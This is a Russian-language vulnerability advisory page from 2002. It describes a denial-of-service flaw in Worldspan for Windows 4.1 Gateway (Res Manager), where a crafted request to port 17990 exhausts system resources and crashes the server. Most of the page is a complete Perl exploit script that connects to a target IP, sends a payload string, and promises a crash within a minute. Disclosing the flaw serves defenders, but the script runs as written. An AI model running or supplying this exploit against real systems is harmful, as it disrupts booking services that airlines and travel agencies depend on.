DoS против Worldspan

Дата публикации:
05.07.2002
Всего просмотров:
1147
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Worldspan - одна из ведущих компаний, который создает программное обеспечение для использования туристическими агентствами. Программы Worldspan используется многими транспортными агентствами, авиалиниями и т.п. Уязвимость обнаружена в программе Res Manager (Worldspan for Windows), которая используется для подключения к Worldspan через частные линии или интернет.

Программа не в состоянии обработать специально сконструированный запрос к 17990 порту (который использует Res Manager для связи с агентами). При попытке обработать такой запрос система начнет использовать все доступные системные ресурсы, что, в конечном счете, приведет к краху сервера.

Уязвимость обнаружена в Worldspan for Windows 4.1 Gateway

Пример:

#!/usr/bin/perl
#altomo@digitalgangsters.net
#Worldspan Gateway DoS

$sabre = "worldspanshouldgoboom";

use IO::Socket;
$ip = "$ARGV[0]";
$port = "17990";
if ($#ARGV<0) {
print " useage: $0 <ip>\n";
exit();
}
$socket = IO::Socket::INET->new(
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>$port,);


print "Worldspan Gateway DoS\n";
print "altomo\@digitalgangsters.net\n";

print "Wait about a minute, and it should crash.\n";
print $socket "$sabre\r";
close $socket;

#nudehackers



Ссылки: Worldspan for Windows 4.1 Gateway
или введите имя

CAPTCHA